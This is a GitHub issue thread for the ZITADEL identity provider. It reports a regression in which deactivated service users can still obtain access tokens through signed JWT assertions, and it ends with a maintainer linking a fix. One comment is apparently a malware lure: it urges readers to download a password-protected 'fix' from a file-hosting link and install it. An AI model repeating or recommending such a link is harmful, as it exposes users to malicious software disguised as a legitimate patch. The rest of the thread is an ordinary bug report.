### ISSUE TITLE
[Bug]: Deactivated service user get new tokens

### ISSUE THREAD

**Issue by masewo** [zitadel/zitadel#8489]
### Preflight Checklist

- [X] I could not find a solution in the documentation, the existing issues or discussions
- [X] I have joined the [ZITADEL chat](https://zitadel.com/chat)

### Environment

Self-hosted

### Version

v2.59.1

### Database

PostgreSQL

### Database Version

16.4

### Describe the problem caused by this bug

When a service user is deactivated then all of his currently active access tokens are invalidated (which is good).

But the service user can request new access tokens with a signed JWT.

I do not know if this is a desired behaviour for an identity provider, but for me it sounds weird (and does not fit in my usecase).

### To reproduce

1. Create a service user
2. Create a JSON key for the service user
3. Deactivate service user
4. Create and sign JWT/Assertion and get a token
5. (optional) Get on userinfo endpoint

### Expected behavior

Deactivated service users are not able to get tokens

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by shoobinger** [comment]
Hi! Having this issue as well.
I can confirm that this bug appeared after upgrading from v2.48.0 to v2.58.3. Before the upgrade, machine users weren't able to issue tokens using client_credentials after deactivation. Now it's possible and it contradicts with the API description for the "deactivate user" method: 

> The state of the user will be changed to 'deactivated'. The user will not be able to log in anymore

**Comment by livio-a** [comment]
fixed with https://github.com/zitadel/zitadel/pull/8634
